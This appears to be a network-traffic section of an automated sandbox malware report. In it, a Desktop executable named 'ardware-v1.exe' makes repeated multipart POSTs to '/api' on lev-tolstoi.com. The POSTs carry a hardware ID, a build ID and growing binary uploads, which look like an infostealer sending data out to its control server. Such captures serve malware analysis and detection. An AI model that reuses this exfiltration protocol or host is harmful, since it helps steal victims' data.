                                                                                                                                                                                                              2024-12-18 08:58:51 UTC1369INData Raw: 6f 2b 70 67 57 4c 43 75 37 6f 63 79 6a 70 78 64 47 43 48 47 4b 44 37 7a 6c 79 67 4d 66 46 79 38 6a 6a 66 4a 59 38 63 63 64 67 64 33 2b 53 42 59 4e 32 31 70 52 6a 65 49 33 52 78 5a 73 4a 65 35 50 62 62 45 2f 4e 37 79 57 33 35 64 38 56 6a 6e 56 70 34 31 56 75 4c 71 63 49 6b 6b 4c 79 76 58 49 42 6f 55 47 56 6a 77 55 48 78 79 64 45 63 71 54 48 66 4b 2b 41 34 78 32 66 57 42 44 62 5a 55 59 32 70 68 32 37 59 76 4c 51 64 31 43 78 36 63 6d 72 4f 55 75 58 75 78 42 72 32 63 63 39 72 39 6e 54 53 5a 5a 4e 63 65 70 51 54 78 36 4f 61 4b 6f 6a 37 68 67 76 59 61 47 67 78 64 34 64 52 37 4c 79 4f 58 50 64 38 30 6d 6e 32 65 4d 46 6f 6b 6c 64 78 30 6c 75 47 70 34 64 70 31 62 32 32 48 4e 51 69 63 48 64 6b 79 56 76 6d 2b 4e 41 61 75 44 2b 41 59 75 45 34 6d 43 75 6b 55 58 6a 64
                                                                                                                                                                                                              Data Ascii: o+pgWLCu7ocyjpxdGCHGKD7zlygMfFy8jjfJY8ccdgd3+SBYN21pRjeI3RxZsJe5PbbE/N7yW35d8VjnVp41VuLqcIkkLyvXIBoUGVjwUHxydEcqTHfK+A4x2fWBDbZUY2ph27YvLQd1Cx6cmrOUuXuxBr2cc9r9nTSZZNcepQTx6OaKoj7hgvYaGgxd4dR7LyOXPd80mn2eMFokldx0luGp4dp1b22HNQicHdkyVvm+NAauD+AYuE4mCukUXjd
                                                                                                                                                                                                              2024-12-18 08:58:51 UTC1369INData Raw: 31 74 32 4c 53 7a 48 4e 64 6f 4f 54 39 70 33 78 61 34 76 50 59 58 37 6c 44 4f 62 75 73 34 33 79 57 50 48 48 48 59 48 64 2f 6b 6a 47 50 52 73 37 6b 51 30 43 78 6c 66 32 58 4f 57 65 48 7a 31 68 2f 35 65 38 68 33 2f 33 6a 4c 59 35 46 55 63 74 70 50 68 71 76 43 4a 4a 43 38 72 31 79 41 61 45 5a 70 61 63 42 5a 6f 74 58 52 42 2f 6c 37 77 32 37 31 4f 4e 38 6c 6a 78 78 78 32 42 33 66 35 49 39 6d 33 62 2b 6c 45 4e 67 6f 66 6e 68 6b 31 56 6e 76 38 64 55 63 2f 57 50 42 64 2f 5a 7a 78 57 69 53 55 33 6e 59 56 59 33 6b 7a 43 72 58 6f 2f 64 45 6d 41 52 30 62 6d 53 46 63 66 72 71 30 52 44 70 65 73 31 70 75 57 65 4f 63 74 5a 62 65 70 51 46 78 36 53 44 5a 38 4b 2b 74 68 62 53 4a 58 39 77 61 38 4a 5a 35 50 6a 64 45 75 70 2f 7a 32 58 2f 63 38 46 75 6c 56 64 38 32 6c 53 56 35
                                                                                                                                                                                                              Data Ascii: 1t2LSzHNdoOT9p3xa4vPYX7lDObus43yWPHHHYHd/kjGPRs7kQ0Cxlf2XOWeHz1h/5e8h3/3jLY5FUctpPhqvCJJC8r1yAaEZpacBZotXRB/l7w271ON8ljxxx2B3f5I9m3b+lENgofnhk1Vnv8dUc/WPBd/ZzxWiSU3nYVY3kzCrXo/dEmAR0bmSFcfrq0RDpes1puWeOctZbepQFx6SDZ8K+thbSJX9wa8JZ5PjdEup/z2X/c8FulVd82lSV5
                                                                                                                                                                                                              2024-12-18 08:58:51 UTC1369INData Raw: 7a 74 42 6e 64 49 6e 74 7a 62 38 39 66 36 76 6e 54 47 76 4a 79 7a 6d 72 34 64 4d 52 69 6d 46 55 32 6d 68 32 41 76 4d 49 79 6b 49 32 6e 47 38 41 6c 5a 7a 31 63 78 45 66 78 36 64 73 4d 2f 6a 50 76 5a 76 56 37 78 57 79 47 48 47 6d 61 52 4d 65 6a 6a 69 71 49 2b 37 63 59 31 43 74 77 63 57 48 4b 57 65 66 33 32 52 62 32 59 38 39 67 38 58 54 49 5a 6f 52 57 66 4d 5a 55 6a 71 6d 4d 59 73 4b 34 39 31 4b 59 4c 32 38 2f 4e 6f 64 6b 36 76 2f 61 43 76 56 2b 67 48 71 33 59 59 42 73 6d 68 77 75 6c 45 2b 56 70 49 6c 71 31 37 57 6c 48 64 41 6e 66 58 39 6f 7a 46 7a 6a 39 64 49 53 38 58 66 42 61 50 68 35 77 47 36 57 56 57 54 5a 48 63 6e 6b 68 58 4b 51 34 2f 63 72 31 43 4e 47 66 48 69 48 53 61 37 6c 6c 68 76 30 4d 5a 67 6c 2b 47 72 4e 59 35 4a 63 65 39 4a 57 68 71 57 42 61 74
                                                                                                                                                                                                              Data Ascii: ztBndIntzb89f6vnTGvJyzmr4dMRimFU2mh2AvMIykI2nG8AlZz1cxEfx6dsM/jPvZvV7xWyGHGmaRMejjiqI+7cY1CtwcWHKWef32Rb2Y89g8XTIZoRWfMZUjqmMYsK491KYL28/Nodk6v/aCvV+gHq3YYBsmhwulE+VpIlq17WlHdAnfX9ozFzj9dIS8XfBaPh5wG6WVWTZHcnkhXKQ4/cr1CNGfHiHSa7llhv0MZgl+GrNY5Jce9JWhqWBat
                                                                                                                                                                                                              2024-12-18 08:58:51 UTC1369INData Raw: 67 47 67 77 66 48 7a 56 55 4f 50 71 31 56 76 47 54 2b 42 75 37 33 6e 4e 59 4a 70 69 53 4d 46 65 69 61 71 46 66 4d 48 37 2b 56 7a 58 61 43 39 47 4c 6f 38 57 33 37 4b 57 42 4c 67 70 67 46 44 36 64 73 35 73 67 45 30 37 39 46 61 52 70 59 39 68 33 50 6d 32 45 63 67 76 4e 7a 45 75 77 52 61 34 72 4a 68 63 2f 47 43 41 50 61 6b 71 6d 7a 37 46 43 79 61 47 51 73 6d 39 77 6e 79 51 34 2b 56 53 6d 44 6f 33 4a 79 36 41 56 66 4c 75 30 42 2f 75 63 6f 64 62 78 31 6a 4c 5a 35 56 51 64 39 4d 64 79 65 53 4e 4b 6f 69 43 39 78 2f 4b 4f 6a 68 75 65 4d 70 47 35 37 44 65 44 66 56 39 67 43 75 35 4e 4d 52 67 6d 6c 6c 78 78 42 4b 56 74 49 6c 6d 78 76 65 7a 44 70 68 6d 4e 32 35 6c 79 45 54 75 2b 35 6b 4e 37 6e 7a 51 5a 76 78 2f 6a 47 4f 48 55 58 71 55 45 38 65 78 69 57 62 57 74 71 4a
                                                                                                                                                                                                              Data Ascii: gGgwfHzVUOPq1VvGT+Bu73nNYJpiSMFeiaqFfMH7+VzXaC9GLo8W37KWBLgpgFD6ds5sgE079FaRpY9h3Pm2EcgvNzEuwRa4rJhc/GCAPakqmz7FCyaGQsm9wnyQ4+VSmDo3Jy6AVfLu0B/ucodbx1jLZ5VQd9MdyeSNKoiC9x/KOjhueMpG57DeDfV9gCu5NMRgmllxxBKVtIlmxvezDphmN25lyETu+5kN7nzQZvx/jGOHUXqUE8exiWbWtqJ
                                                                                                                                                                                                              2024-12-18 08:58:51 UTC1369INData Raw: 7a 4e 2f 31 46 6a 72 36 74 46 63 78 7a 2b 41 66 62 6b 67 67 46 36 56 55 6e 6a 54 53 35 62 70 70 47 6e 58 76 62 51 53 7a 7a 6b 33 4d 53 37 42 46 72 69 75 6d 46 7a 38 59 49 41 39 71 53 71 62 50 73 55 4c 4a 6f 5a 43 79 62 33 43 66 4a 44 6a 35 46 4b 59 4f 6a 63 6e 4c 6f 42 59 37 66 33 56 45 76 74 6a 30 6d 50 36 62 73 4d 73 71 47 4a 54 32 56 43 43 71 6f 56 55 37 70 71 39 44 4e 55 6e 63 45 46 51 38 45 66 6e 37 4a 51 36 2b 32 66 44 4a 62 63 34 32 43 76 4f 48 46 66 65 54 59 71 72 68 53 71 65 2b 37 4e 63 67 47 68 53 63 6d 50 43 57 4f 65 2b 39 78 62 6f 66 4d 39 69 75 54 61 41 5a 39 59 45 4e 74 56 58 6c 36 6d 4e 62 5a 79 38 72 52 75 59 5a 6a 64 78 4c 70 38 57 34 66 62 47 45 66 64 32 6a 47 50 33 64 6f 42 30 32 45 55 32 77 68 33 66 39 38 77 71 77 76 76 76 58 4a 38 6d
                                                                                                                                                                                                              Data Ascii: zN/1Fjr6tFcxz+AfbkggF6VUnjTS5bppGnXvbQSzzk3MS7BFriumFz8YIA9qSqbPsULJoZCyb3CfJDj5FKYOjcnLoBY7f3VEvtj0mP6bsMsqGJT2VCCqoVU7pq9DNUncEFQ8Efn7JQ6+2fDJbc42CvOHFfeTYqrhSqe+7NcgGhScmPCWOe+9xbofM9iuTaAZ9YENtVXl6mNbZy8rRuYZjdxLp8W4fbGEfd2jGP3doB02EU2wh3f98wqwvvvXJ8m


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              5192.168.2.849717104.21.66.864437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:58:53 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=0SYGSMFUW8EWPM
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 12817
                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                              2024-12-18 08:58:53 UTC12817OUTData Raw: 2d 2d 30 53 59 47 53 4d 46 55 57 38 45 57 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 53 59 47 53 4d 46 55 57 38 45 57 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 53 59 47 53 4d 46 55 57 38 45 57 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 30 53 59 47 53 4d 46 55 57 38 45 57 50
                                                                                                                                                                                                              Data Ascii: --0SYGSMFUW8EWPMContent-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--0SYGSMFUW8EWPMContent-Disposition: form-data; name="pid"2--0SYGSMFUW8EWPMContent-Disposition: form-data; name="lid"tfL8re----0SYGSMFUW8EWP
                                                                                                                                                                                                              2024-12-18 08:58:54 UTC1036INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:58:54 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=oduhjumptfj0s9q6n9udkm596b; expires=Sun, 13-Apr-2025 02:45:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qNmQvUQMKiJ6j0%2FfVNfHzVxYllXBlVyto8bEilfGqDlpd93UXCCA%2BCi70qGoWOzRR7RjzImAwa3aYLGpXDEBt5SY0T3aMm0ILioCHeQPaRRI0bdSMaWduKkgix6nSkstjy8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8f3df4257d535e64-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1588&rtt_var=599&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13752&delivery_rate=1819314&cwnd=245&unsent_bytes=0&cid=a207020de59a41bc&ts=925&x=0"
                                                                                                                                                                                                              2024-12-18 08:58:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                              2024-12-18 08:58:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              6192.168.2.849718104.21.66.864437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:58:55 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=PWR04A959
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 15016
                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                              2024-12-18 08:58:55 UTC15016OUTData Raw: 2d 2d 50 57 52 30 34 41 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 57 52 30 34 41 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 57 52 30 34 41 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 50 57 52 30 34 41 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                              Data Ascii: --PWR04A959Content-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--PWR04A959Content-Disposition: form-data; name="pid"2--PWR04A959Content-Disposition: form-data; name="lid"tfL8re----PWR04A959Content-Dispositi
                                                                                                                                                                                                              2024-12-18 08:58:57 UTC1043INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:58:57 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=vfss6qq7ifgbng547kd90jb5pd; expires=Sun, 13-Apr-2025 02:45:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0zn%2BGs5GjFhEcgYJyfyVABbDRZoWVBURF1QCNQy5nGmdHrsKmm5vpKQ0cMdA4S6D1EJQcXF2CIt3%2F8%2B6r0T%2B72I0cyQ9UryV8ypmcfBcoqd4XMNd1dstMoybOsI%2BtA8chU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8f3df4343b3f5e6e-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1557&rtt_var=619&sent=13&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15946&delivery_rate=1719670&cwnd=235&unsent_bytes=0&cid=5ac141eefd2c56bc&ts=1884&x=0"
                                                                                                                                                                                                              2024-12-18 08:58:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                              2024-12-18 08:58:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              7192.168.2.849719104.21.66.864437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:58:59 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=TRK9XY1MPYD13
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 20207
                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                              2024-12-18 08:58:59 UTC15331OUTData Raw: 2d 2d 54 52 4b 39 58 59 31 4d 50 59 44 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 52 4b 39 58 59 31 4d 50 59 44 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 52 4b 39 58 59 31 4d 50 59 44 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 54 52 4b 39 58 59 31 4d 50 59 44 31 33 0d 0a 43
                                                                                                                                                                                                              Data Ascii: --TRK9XY1MPYD13Content-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--TRK9XY1MPYD13Content-Disposition: form-data; name="pid"3--TRK9XY1MPYD13Content-Disposition: form-data; name="lid"tfL8re----TRK9XY1MPYD13C
                                                                                                                                                                                                              2024-12-18 08:58:59 UTC4876OUTData Raw: 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                              Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                                                                                                                              2024-12-18 08:59:01 UTC1039INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:59:00 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=q5fb68demhadcvnfk2i5qe4sv0; expires=Sun, 13-Apr-2025 02:45:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QEMHniM3xkobdL5gJXlZcztZAchr2NKyjlnbXrdxz9Ei2E8znaOddYTKi0uPI%2FjxZUuhJKqLi0e1Snf4jKRq2J6PSJ4718hhsqSSe8EFY74wjfDSzrJdQe9r0%2B%2FK2GUwBVw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8f3df4498b98f5f7-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1514&rtt_var=572&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21163&delivery_rate=1928665&cwnd=237&unsent_bytes=0&cid=19d493c04ffc0ef6&ts=1845&x=0"
                                                                                                                                                                                                              2024-12-18 08:59:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                              2024-12-18 08:59:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              8192.168.2.849720104.21.66.864437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:59:02 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=CY2NMLA0B
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 1163
                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                              2024-12-18 08:59:02 UTC1163OUTData Raw: 2d 2d 43 59 32 4e 4d 4c 41 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 32 38 44 35 37 41 34 35 39 37 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 59 32 4e 4d 4c 41 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 59 32 4e 4d 4c 41 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 43 59 32 4e 4d 4c 41 30 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                              Data Ascii: --CY2NMLA0BContent-Disposition: form-data; name="hwid"AF28D57A4597695CAC8923850305D13E--CY2NMLA0BContent-Disposition: form-data; name="pid"1--CY2NMLA0BContent-Disposition: form-data; name="lid"tfL8re----CY2NMLA0BContent-Dispositi
                                                                                                                                                                                                              2024-12-18 08:59:03 UTC1041INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Wed, 18 Dec 2024 08:59:03 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: PHPSESSID=mr8tkur0it1qogu65o0nh2hrhr; expires=Sun, 13-Apr-2025 02:45:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kAE1dJd%2Bp8ZNbB56EYMfFFYdMA8ktIB4OHm7Xq2iesEDPrUjZiQyftGVQ6LifQBFo%2Be3m%2BZox%2FRkPyU7jhVytRnYYT8%2FYNt01oEsDvcNxxJMSDPkxTA2KLeRUqwUelIM%2FcA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8f3df45f5c25de9b-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1438&rtt_var=620&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2070&delivery_rate=1655328&cwnd=192&unsent_bytes=0&cid=193ccdceb4fb3571&ts=867&x=0"
                                                                                                                                                                                                              2024-12-18 08:59:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                              2024-12-18 08:59:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              9192.168.2.849721104.21.66.864437748C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-12-18 08:59:05 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=T20P8D76V41Z
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                              Content-Length: 590968
                                                                                                                                                                                                              Host: lev-tolstoi.com
